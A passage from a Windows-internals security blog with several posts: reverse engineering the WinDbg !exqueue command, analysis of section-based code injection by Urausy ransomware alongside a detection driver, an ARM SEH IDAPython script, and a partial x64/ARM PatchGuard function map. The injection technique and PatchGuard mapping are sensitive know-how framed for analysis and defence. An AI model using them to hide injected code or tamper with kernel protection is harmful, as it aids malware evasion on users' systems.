<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine dxgkrnl!DxgkpProcessTerminationListThread </span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">(...) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Parameter (ffffe0008105fbb0)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">WdfWorkItem (ffffe00082b035a0) </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine cdrom!IoctlWorkItemRoutine</span> (fffff80072c6e900)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">ExWorkItem (fffff8006b8ff0c0) </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine nt!CmpDelayDerefKCBWorker</span> (fffff8006ba5d008) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Parameter (0000000000000000)</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> -> Priority 31 - ( Concurrency: 0/2 )</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="font-size: xx-small;"><br /></span>
<span style="font-size: xx-small;"> -> Associated Threads</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">THREAD ffffe000828fe040 Cid 0004.0170 Teb: 0000000000000000 Win32Thread: 0000000000000000 WAIT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<br />
<h3>
Re-implementing the Command</h3>
<br />
<div>
My goal was, however, not to use the command; the goal was to know how it works, so I reverse engineered !exqueue more to learn the details of the work queues and how to enumerate items in them by hand.<br />
<br />
Analyzing Windbg commands is often a lot easier than analyzing the kernel file because it contains a lot of strings that help you know what structures are dealt with.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYNu6DiVZ6n91Ujsenx4YqadgnRBsKfTY9OqS5mTvDU8s6qoEe4YCT-ZgXFWxzsjXfI9NmJmDmC9J2kQiPci2qObd0oc6QDmxWfPuDW6BodWOxjOVUEuYLdCOJoiGLcn5SwbEsBkicI5g/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYNu6DiVZ6n91Ujsenx4YqadgnRBsKfTY9OqS5mTvDU8s6qoEe4YCT-ZgXFWxzsjXfI9NmJmDmC9J2kQiPci2qObd0oc6QDmxWfPuDW6BodWOxjOVUEuYLdCOJoiGLcn5SwbEsBkicI5g/s320/1.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image1: Strings in code of !enqueue</td></tr>
</tbody></table>
This time was not exception. Basically, for Windows 8 and later, the command gets a NUMA node (nt!_ENODE) structure containing a reference to the work queues with looking at nt!KeNumberNodes and nt!KeNodeBlock first. Here, I follow the same procedure as !exqueue using basic commands.<br />
<br />
There is only one NUMA node block as I do not configure NUMA.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dw nt!KeNumberNodes</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f5774008 <span style="color: red;">0001</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dps nt!KeNodeBlock</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f576c800 <span style="color: red;">fffff803`f56c3240</span> nt!ExNode0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f576c808 00000000`00000000</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f576c810 00000000`00000000</span></div>
<div>
<br />
Then, the command refers to the _ENODE.ExWorkQueue.WorkPriQueue.EntryListHead field, which is an array of the prioritized work queues.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dt nt!_ENODE ExWorkQueue.WorkPriQueue. <span style="color: red;">fffff803`f56c3240</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x0c0 ExWorkQueues : [8]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x100 ExWorkQueue :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x000 WorkPriQueue :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x000 Header : _DISPATCHER_HEADER</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x018 <span style="color: red;">EntryListHead : [32] _LIST_ENTRY [</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> 0xfffff803`f56c3358 -</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> 0xfffff803`f56c3358 </span></span><span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: xx-small;">]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x218 CurrentCount : [32] 0n0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x298 MaximumCount : 4</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x2a0 ThreadListHead : _LIST_ENTRY [</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> 0xffffe000`eb78f248 -</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> 0xffffe000`ecd89a88 ]</span></div>
<br />
Each element of the EntryListHead is a list of work items (nt!_WORK_QUEUE_ITEM), and the array represents priorities of each list; in other words, there are 32 work queues and each manages items with priority 0 (the lowest) to 31 (the highest) respectively.<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">kd> dt nt!_ENODE -a ExWorkQueue.WorkPriQueue.EntryListHead </span><span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">fffff803`f56c3240</span><br />
<span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: xx-small;"> </span><span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> [12] _LIST_ENTRY [ <span style="color: red;">0xffffe000`846f62f0</span> - 0xffffe000`82bea2c0 ]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dt nt!_WORK_QUEUE_ITEM <span style="color: red;">0xffffe000`846f62f0</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x000 List : _LIST_ENTRY [ 0xffffe000`8305d130 -</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> 0xfffff800`6b8ca418 ]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x010 <span style="color: red;">WorkerRoutine : 0xfffff800`746dd290</span> </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> void ListWorkItems!<lambda_7d382b...>+0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x018 Parameter : 0xfffff800`746df220 Void</span><br />
<br />
The !exqueue command shows the contents of the lists as well as associated worker threads referred by the ThreadListHead field.<br />
<br />
All you can do, I can do :) I wrote a driver that dumps all items in each work queue to confirm that the above analysis was correct. Note that because this driver is just PoC, it works only on the 64 bit version of Win8.1 and Win10.<br />
<br />
<a href="https://github.com/tandasat/ListWorkItems">https://github.com/tandasat/ListWorkItems</a><br />
<br />
<h3>
Conclusion</h3>
Analyzing Windbg commands often gives you good understanding of the Windows kernel with a less effort than analyzing the kernel file, and even if you do not find a helpful command at a glance, there may be an undocumented command which you can reverse engineer to unveil the Windows internals.<br />
<br />
<h4>
Side Notes</h4>
<ol>
<li>It seems that !exqueue used to be documented and then abandoned for some reasons. I found a description about it on a help file came with the Windbg version 6.11.001.404.</li>
</ol>
<ul>
<li>The ExWorkQueues field in the _ENODE also holds pointers to the WorkPriQueue structures. It is likely that the structures are allocated for each processor but only one associated with the processor 0 is really used. </li>
</ul>
<ul>
<li>Apparently, an item does not go to the queue if any of worker threads is in a wait state (ie, waiting for an item) when the item is being queued. I guess the item is associated with a thread without being stored in the queue for performance in this case. For this reason, the command does not show the first item when multiple items are queued at once. </li>
</ul>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com4tag:blogger.com,1999:blog-2937860723034111347.post-7339564410198132842015-03-07T14:13:00.000-08:002015-03-07T16:48:57.793-08:00Section Based Code Injection and Its Detection<h4>
Summary</h4>
I wrote <a href="https://github.com/tandasat/RemoteWriteMonitor" target="_blank">a small tool</a> to detect a possible code injection even if it is done by only section APIs.<br />
<br />
----<br />
<br />
A few weeks ago, I had an opportunity to analyze ransomware referred as Urausy. At a very initial stage of analysis, its behaviour seemed to be nothing surprising to me; it injected code into explorer.exe, and the injected code spawned svchost.exe hosting malicious code and initiated main ransom activities (More detaied analysis can be found on <a href="https://blog.avast.com/2013/07/24/urausy-lockscreen-your-computer-will-remain-locked-for-3-days-11-hours-and-20-minutes/" target="_blank">avast! blog</a>).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjrjbdKGgetc-hukrTotzbtXCStuAlZHeyFdHLkDmlZ4ru-rYkbTQU0UAD5dEOd4ARV723hHpa-nhI7dupCuZjwAi0rv66KeF_to5mSEVtRimJ74EZGpujyOivNfm_ZujhpaZbQvzCC4/s1600/ProcessTree.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjrjbdKGgetc-hukrTotzbtXCStuAlZHeyFdHLkDmlZ4ru-rYkbTQU0UAD5dEOd4ARV723hHpa-nhI7dupCuZjwAi0rv66KeF_to5mSEVtRimJ74EZGpujyOivNfm_ZujhpaZbQvzCC4/s1600/ProcessTree.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 1: Process Tree </td></tr>
</tbody></table>
I expected that the sample was injecting code using VirtualAllocEx() and CreateRemoteThread(), or relevant APIs such as NtWriteVirtualMemory() NtCreateThread/Ex(). But through analysis, I noticed that it was using none of them for the injection but using section APIs instead. Malware replaced the existing ntdll image on explorer.exe with a newly created section containing an inline hook on NtClose() and code responsible for starting svchost.exe. Output of VMmap indicates that an image of ntdll no longer exists and replaced with a shared Executable/Readable/Writable section after this injection.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXBRrEio-HXWcwF-m48aA3e9HJA_1fFZXV0A1TyOP6Jmh-BolcKr86PtXdUcCk_vNmG83ppejVQ8CWz_9EX7-MRfr-6nc4FU4d9iGitgV1qZujwDc65YZO0-c7dnd-q2sDpfNXxNeFWnw/s1600/VMMapBefore.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXBRrEio-HXWcwF-m48aA3e9HJA_1fFZXV0A1TyOP6Jmh-BolcKr86PtXdUcCk_vNmG83ppejVQ8CWz_9EX7-MRfr-6nc4FU4d9iGitgV1qZujwDc65YZO0-c7dnd-q2sDpfNXxNeFWnw/s1600/VMMapBefore.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 2: Memory Map of Explorer.exe (Before Infection)</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1FrxwW1ImQBDJNedlPW7zg-_6ObnCVrpHfIMyHSy3Bexylfqx463FEyssOPgMPzueLJZDE9ixGiTFFWyVEPNyPedDpZXPb4wOZhGl7AvH3bL3kq4MjoqI8KlIgKfU2U_ag9YcvyF5qw/s1600/VMMapAfter.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1FrxwW1ImQBDJNedlPW7zg-_6ObnCVrpHfIMyHSy3Bexylfqx463FEyssOPgMPzueLJZDE9ixGiTFFWyVEPNyPedDpZXPb4wOZhGl7AvH3bL3kq4MjoqI8KlIgKfU2U_ag9YcvyF5qw/s1600/VMMapAfter.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 3: Memory Map of Explorer.exe (After Infection) </td></tr>
</tbody></table>
Then, I started to wonder what if explorer.exe did not do any obvious activities I could easily spot and the sample did many other bad things besides that in meaningful ways (i.e., non junk operations)? I could miss the injected code.<br />
<br />
It is also true of the case of the traditional code injection with VirtualAllocEx() and CreateRemoteThread(), but we are less likely to overlook it as we always expect to see that these APIs are used for injection and have tools or systems that tell us occurrence of typical thread injection.<br />
<br />
So I wrote a driver, <a href="https://github.com/tandasat/RemoteWriteMonitor" target="_blank">RemoteWriteMonitor</a>, monitors inter-process memory modification by hooking NtWriteVirtualMemory() and ZwMapViewOfSection() to assist analysts to find this section based injection. This tool should report all possible code injections because if you want to execute your own code on another process from the user-mode, you need to either (1) write something onto the other process using those APIs (as far as I can think of), or (2) use a DLL file in conjunction with SetWindowsHookEx() or other type of injection mechanisms which is very easy to find due to preceding a disk write operation.<br />
<br />
Let us see what it does in case of another Urausy sample I found on <a href="https://malwr.com/analysis/MzJjYzNjNDM1Y2QxNDNjNWE4MjQ5NWIwOTc5MWQ5MDc/" target="_blank">Malwr</a>. If you installed the driver and run the sample, you see that the sample is mapping sections onto explorer.exe using ZwMapViewOfSection().<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyp3DZVkjfsTPh0OWqEY2U7LkL_mpTYpuuwdKoD4ev3cWjP10qcBVOV2nrjknnek5hOlPbB8mZKabCCbZmw_UvcQRTWAhthn5qHbkzRUtih3kccbHddauqbDT4_3iR6pSK3gJ7yxRYjI/s1600/DbgView+(2).png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyp3DZVkjfsTPh0OWqEY2U7LkL_mpTYpuuwdKoD4ev3cWjP10qcBVOV2nrjknnek5hOlPbB8mZKabCCbZmw_UvcQRTWAhthn5qHbkzRUtih3kccbHddauqbDT4_3iR6pSK3gJ7yxRYjI/s1600/DbgView+(2).png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 4: Output on DebugView<br />
<br /></td></tr>
</tbody></table>
<br />
<br />
<br />
This tool also saves the contents of memory being written as <SHA1>.bin so that you can examine what it is later. In this example, written data was code and a PE image respectively.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1vBQa3N6Tv_DyNraFgqm3GswUAd9ZpO3Z8AEUMOrPwAj432QLhadccggJyqSU8KMlcUdFJqFlpzY2agaKXdvmZDUT3m2BK8OoAXrL6o3RxnQSKv63rFWetmjnoNWmGXdDBWEEhwSrp1o/s1600/Contents.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1vBQa3N6Tv_DyNraFgqm3GswUAd9ZpO3Z8AEUMOrPwAj432QLhadccggJyqSU8KMlcUdFJqFlpzY2agaKXdvmZDUT3m2BK8OoAXrL6o3RxnQSKv63rFWetmjnoNWmGXdDBWEEhwSrp1o/s1600/Contents.png" height="528" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 5: File Contents (Code upside and PE downside)</td></tr>
</tbody></table>
This tool is more like PoC and does not have rich functionality, but I hope it helps you understand this uncommon injection method and its detection.Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com2tag:blogger.com,1999:blog-2937860723034111347.post-82219180463590941082015-01-26T07:50:00.000-08:002015-01-26T07:52:31.978-08:00ARM Exception Handling and an IDAPython Script<div class="p1">
<span class="s1">Windows RT has differences in several points, and implementation of SEH is one of them. T</span>o sort out my understanding of ARM exception handling, I wrote an <a href="https://github.com/tandasat/scripts_for_RE/blob/master/parse_ARM_SEH.py" target="_blank">IDAPython script</a> that interprets SEH information in an Windows RT PE file and applies it to an IDB. Here is an example of how this script helps you (I use one of PatchGuard routines uses SEH to obfuscate its code flow):</div>
<div class="p2">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7KquAIakAjPyGrsc-tt8XQOy1iXXmcme_sGEz8vLsahv2OmE1Q9z98dv0dNQYOOF_xt_K0EJvbHqAQow-uqk6zWnO-prf1x9b6TYaP2R68HrIurlpxMTGvKpeleWXUhO5B7LHrFmUONI/s1600/before.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-align: left;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7KquAIakAjPyGrsc-tt8XQOy1iXXmcme_sGEz8vLsahv2OmE1Q9z98dv0dNQYOOF_xt_K0EJvbHqAQow-uqk6zWnO-prf1x9b6TYaP2R68HrIurlpxMTGvKpeleWXUhO5B7LHrFmUONI/s1600/before.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image1: Before Use (plain output of IDA)</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvO0yOeTUTZMKKNbLV8580qUEO8x4NA9aA_k3tOXUrmPCgCcqUUrG92_TVWaI58wRDOnM0qiLPGrAIS4t92y-OslI28AJWe2MUGUvMtciG419MnvgwExLkHE81AxhWXPehMwO9Zh84w6s/s1600/after.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvO0yOeTUTZMKKNbLV8580qUEO8x4NA9aA_k3tOXUrmPCgCcqUUrG92_TVWaI58wRDOnM0qiLPGrAIS4t92y-OslI28AJWe2MUGUvMtciG419MnvgwExLkHE81AxhWXPehMwO9Zh84w6s/s1600/after.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image2: After Use</td></tr>
</tbody></table>
In the image2, comments show that there is a __try/__except block around a call to __rt_sdiv().<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhceJ5hpaPlxlJQDPqszSgkHOXI_dWwkzw5-48QvLxJNewWGga7Am9shh8P2KRFvAE1nsK5pTw18iRdBH4BY_0AcyDmdtdOUct_CN1_-4HOx80vju80GLuCzA-Ge3HHi-E_RDgvR0OGoCs/s1600/after2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhceJ5hpaPlxlJQDPqszSgkHOXI_dWwkzw5-48QvLxJNewWGga7Am9shh8P2KRFvAE1nsK5pTw18iRdBH4BY_0AcyDmdtdOUct_CN1_-4HOx80vju80GLuCzA-Ge3HHi-E_RDgvR0OGoCs/s1600/after2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image3: Exception Filter</td></tr>
</tbody></table>
<span class="s1"></span>If you look at the location of an exception filter, you will find that the exception filter is calling another interesting looking function, which is actually authentic PatchGuard code flow. You could miss this path if you were just looking at plain output of IDA like the image1. This script will help you tell existence of SEH handlers.</div>
<br />
<div class="p1">
<span class="s1">About the internal of ARM exception handling, I do not explain it here as there is detailed enough explanations on MSDN[1] to understand it, but in short, it is fairly similar to one on x64. For instance, each function in a file is dictated by a RUNTIME_FUNCTION structure located in a .pdata section, and the structure points to an .xdata record consists of a SCOPE_TABLE structure and an array of its entries describing ranges of __try block</span>s, addresses of except filters and body blocks (or finally blocks). These are all essentially the same design as x64. </div>
<div class="p1">
<span class="s1"><br /></span></div>
<div class="p1">
<span class="s1">As a note, I listed some references below which may complement your understanding of ARM exception handing[2][3][4][5]. Hope you enjoy them and my script too. </span><br />
<br />
<ol>
<li><a href="https://msdn.microsoft.com/en-us/library/dn743843.aspx" target="_blank">ARM Exception Handling</a></li>
<li><a href="http://vrt-blog.snort.org/2014/06/exceptional-behavior-windows-81-x64-seh.html" target="_blank">Exceptional behavior: the Windows 8.1 X64 SEH Implementation</a><br />References listed at the top of the articles are all exceptionally good, apart from this article.</li>
<li><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms680597%28v=vs.85%29.aspx" target="_blank">RtlLookupFunctionEntry function</a><br />Returns a corresponding .pdata entry for a given address.</li>
<li><a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff563104(v=vs.85).aspx" target="_blank">.fnent (Display Function Data)</a><br />You can dump .pdata/.xdata information with it.</li>
<li><a href="http://blogs.norman.com/2011/for-consumption/improving-ida-analysis-of-x64-exception-handling" target="_blank">Improving IDA Analysis of x64 Exception Handling</a><br />An x64 version of my script. Very handy.</li>
</ol>
</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-26349530637734475842015-01-21T07:10:00.000-08:002015-01-21T07:24:13.896-08:00A List of PatchGuard v8.1 Related Functions on x64 and ARMI was working on analyzing PatchGuard on Windows RT 8.1 (which runs on ARM) last two months and got that work done recently. Analysis tuned out to be a lot easier than I expected mostly because PatchGuard's code was written in C and had the almost same structure on both x64 which I had already analyzed and ARM.<br />
<br />
In order to look at PatchGuard on Window RT 8.1, almost all I had to do was to identify PatchGuard related functions and map them with corresponding functions on x64.<br />
<br />
Here is a table showing that mapping (ones have different names between platforms are highlighted).<br />
<br />
<table border="0" cellspacing="0" cols="2" frame="VOID" rules="NONE">
<colgroup><col width="317"></col><col width="383"></col></colgroup>
<tbody>
<tr>
<td align="CENTER" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;" width="317"><b>x64</b></td>
<td align="CENTER" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;" width="383"><b>ARM</b></td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcAdjustBcbDepth</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcUnmapBehindLazyReader</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcBcbProfiler</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcDelayedFlushTimer</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcInitializeBcbProfiler</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcPrepareDelayedFlushTimers</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpAppendDllSection</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpWnfAcquireNameInstanceShared</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpEnableLazyFlushDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpEnableLazyFlushDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpLazyFlushDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpLazyFlushDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">DeferredRoutine</td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExInitSystemPhase2</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExInitSystemPhase2</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpCenturyDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpCenturyDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimerDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimerDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeRefreshDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeRefreshDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeZoneDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeZoneDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlMdlReadCompleteDevEx</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">RtlpExecuteHandlerForUnwind_xdata_compact</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlUninitializeSmallMcb</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpPrefetchPushLock</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">IopTimerDispatch</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">IopTimerDispatch</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeCompactServiceTable</td>
